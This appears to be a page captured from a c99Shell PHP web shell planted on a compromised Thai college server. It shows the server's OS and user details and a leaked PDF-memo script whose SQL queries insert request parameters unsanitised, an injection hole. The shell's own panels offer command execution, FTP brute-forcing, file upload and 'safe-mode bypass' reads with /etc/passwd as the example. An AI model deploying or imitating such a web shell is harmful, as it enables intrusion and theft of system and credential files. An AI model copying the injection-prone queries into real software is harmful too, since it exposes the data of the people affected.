!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     prePrintEditMemoPDF.php (5.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//PDF USING MULTIPLE PAGES
//FILE CREATED BY: Carlos Jos้ Vแsquez Sแez
//YOU CAN CONTACT ME: carlos@magallaneslibre.com
//FROM PUNTA ARENAS, MAGALLANES
//INOVO GROUP - http://www.inovo.cl


/**  Configuration  */
require_once( "../configuration.php" );
require_once( 
$_Config_absolute_path "/includes/connMySQL.class.php");    
require(
'../fpdf/fpdf.php');
        
    
/**  Create Database Object  */
$dbObj = new DBConn;
                
$query " SELECT *  FROM personal_tb 
LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId 
LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId 
LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code 
WHERE personal_tb.Teacher_code='"
.$_REQUEST['Teacher_code']."'";
$result $dbObj->execQuery($query);
$rs $dbObj->fetchArray($result);
            
//$query2 = " SELECT * ,  formproject_edit_tb.Budget as  formproject_edit_tb_Budget , project_type_tb.Budget_total as project_type_tb_Budget_total  FROM formproject_edit_tb , project_tb , project_type_tb , money_source_tb  WHERE formproject_edit_tb.upId = '".$_REQUEST['upId']."'  and  formproject_edit_tb.ProjectId = project_type_tb.ProjectId and project_tb.MoneyS_C = money_source_tb.MoneyS_C ";
 
$query2 " SELECT *  FROM  formproject_edit_tb  WHERE  Teacher_code='$Teacher_code'  and  upId='$upId'    ";
$result2 $dbObj->execQuery($query2);
$rs2 $dbObj->fetchArray($result2); 


$query3 "Select * From  college Where collegeStatus ='1'";
$result3 $dbObj->execQuery($query3);
$rs3 $dbObj->fetchArray($result3);

$query4 "Select * From personal_tb 
LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId 
LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId 
LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code 
Where personal_tb.Faculty_code = '"
.$rs['Faculty_code']."' and personal_tb.TeacherId = '1'";
$result4 $dbObj->execQuery($query4);
$rs4 $dbObj->fetchArray($result4);    

/*$query5 = " SELECT *  FROM training_tb  WHERE training_tb.Training_code = '".$_REQUEST['Training_code']."' ";
$result5 = $dbObj->execQuery($query5);
$rs5 = $dbObj->fetchArray($result5);*/

$query6 " SELECT SUM(Budget_use) AS SumB1  FROM project_tb  WHERE  ProjectId='".$rs2['ProjectId']."' ";
$result6 $dbObj->execQuery($query6);
$rs6 $dbObj->fetchArray($result6);    

function 
getMonthTh($mm) {
    if(
$mm=='01') { $mm='มกราคม'; }
    else if(
$mm=='02') { $mm='กุมภาพันธ์'; }
    else if(
$mm=='03') { $mm='มีนาคม'; }
    else if(
$mm=='04') { $mm='เมษายน'; }
    else if(
$mm=='05') { $mm='พฤษภาคม';}
    else if(
$mm=='06') { $mm='มิถุนายน'; }
    else if(
$mm=='07') { $mm='กรกฎาคม'; }
    else if(
$mm=='08') { $mm='สิงหาคม'; }
    else if(
$mm=='09') { $mm='กันยายน'; }
    else if(
$mm=='10') { $mm='ตุลาคม';}
    else if(
$mm=='11') { $mm='พฤศจิกายน';}
    else if(
$mm=='12') { $mm='ธันวาคม'; }

    return 
"$mm";
}

//Create new pdf file
$pdf = new FPDF();

//Set thai font
$pdf->SetThaiFont();

$pdf->AddPage();

//-- Load Form Image to Background
$pdf->Image('../form/plan_edit.jpg'00205297);

//-- Set Font
$pdf->SetFont('AngsanaNew','',15);

//-- College name and Date , Top-Right Position
$date explode("-",$rs2[Date]);
$day intval($date[2]);
$month getMonthTh(intval($date[1]));
$year intval($date[0]);

$pdf->Text(40,46.7,$rs3['collegeName']);

if(!empty(
$day)){
    
$pdf->SetXY(138.5,48.5);
    
$pdf->Cell(9,5,$day,0,0,'C');
    
$pdf->SetXY(155,48.5);
    
$pdf->Cell(23,5,$month,0,0,'C');
    
$pdf->SetXY(183,48.5);
    
$pdf->Cell(12,5,$year,0,0,'C');
}
else{
    
$pdf->SetXY(138.5,48.5);
    
$pdf->Cell(9,5,'-',0,0,'C');
    
$pdf->SetXY(155,48.5);
    
$pdf->Cell(23,5,'-',0,0,'C');
    
$pdf->SetXY(183,48.5);
    
$pdf->Cell(12,5,'-',0,0,'C');
}

//-- Set Font
$pdf->SetFont('AngsanaNew','',13);

//--  Request header
if(!empty($rs2['proNo'])){
    
$pdf->SetXY(23.5,48.8);
    
$pdf->Cell(34,5,$rs2['proNo'],0,0,'C');
}
else{
    
$pdf->SetXY(23.5,48.8);
    
$pdf->Cell(34,5,'-',0,0,'C');
}

$pdf->Text(30,66.7,'ผู้อำนวยการ '.$rs3['collegeName']);

//-- Body
$pdf->SetXY(31,69.5);
$pdf->Cell(88.3,5,$rs['prefixName'].'  '.$rs['Teacher_name'].'  '.$rs['Teacher_lastname'],0,0,'C');
$pdf->SetXY(131.5,69.5);
$pdf->Cell(63,5,$rs['Position_name'],0,0,'C');
$pdf->SetXY(28.9,76.5);
$pdf->Cell(166,5,$rs['Faculty_name'].'     '.$rs3['collegeName'].'     สถาบันพระบรมราชชนก',0,0,'C');

if(
strlen($rs2['Training_name']) > 100){    
    
$tmp[0] = substr($rs2['Training_name'],0,91);
    
$tmp[1] = substr($rs2['Training_name'],91,strlen($rs2['Training_name']));
    
    
$pdf->SetXY(65,83.3);
    
$pdf->Cell(130,5,$tmp[0],0,0,'C');
    
    
$pdf->SetXY(21,90.3);
    
$pdf->Cell(174,5,$tmp[1],0,0,'L');
}
else{
    
$pdf->SetXY(65,83.3);
    
$pdf->Cell(130,5,$rs2['Training_name'],0,0,'C');
}

$pdf->SetXY(59.7,97);
$pdf->Cell(8.7,5,$rs2['Orderlist'],0,0,'C');

$pdf->SetFont('AngsanaNew','',11);

$pdf->SetXY(93.7,97);
$pdf->Cell(101,5,substr($rs2['Project_plan'],0,75),0,0,'C');

$pdf->SetFont('AngsanaNew','',13);

$pdf->SetXY(39.5,104);
$pdf->Cell(26.5,5,$rs2['Year_std'],0,0,'C');

$pdf->SetXY(81,104);
$pdf->Cell(32.5,5,number_format($rs2['Budget'],2,'.',','),0,0,'C');

$pdf->SetXY(134.3,104);
$pdf->Cell(60.5,5,$rs2['MoneyS_M'],0,0,'C');

$pdf->SetXY(67.7,110.8);
$pdf->Cell(32.5,5,number_format($rs2['Budget_total'],2,'.',','),0,0,'C');

//$pdf->SetXY(151.5,110.8);
//$pdf->Cell(31.9,5,number_format($rs6['SumB1'],2,'.',','),0,0,'C');

$pdf->SetXY(65.5,117.7);
$pdf->Cell(131.9,5,$rs2['nameDetail'] ,0,0,'C');




//-- signature

$pdf->SetXY(133,156);
$pdf->Cell(60,5,$rs['prefixName'].'  '.$rs['Teacher_name'].'  '.$rs['Teacher_lastname'],0,0,'C');
$pdf->SetXY(138,162.8);
$pdf->Cell(55,5,$rs['Position_name'],0,0,'C');

$pdf->SetXY(40.3,182.3);
$pdf->Cell(50.5,5,$rs4['prefixName'].'  '.$rs4['Teacher_name'].'  '.$rs4['Teacher_lastname'],0,0,'C');
$pdf->SetXY(46,189.2);
$pdf->Cell(53,5,$rs4['Position_name'],0,0,'C');

//Create file
$pdf->Output();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0097 ]--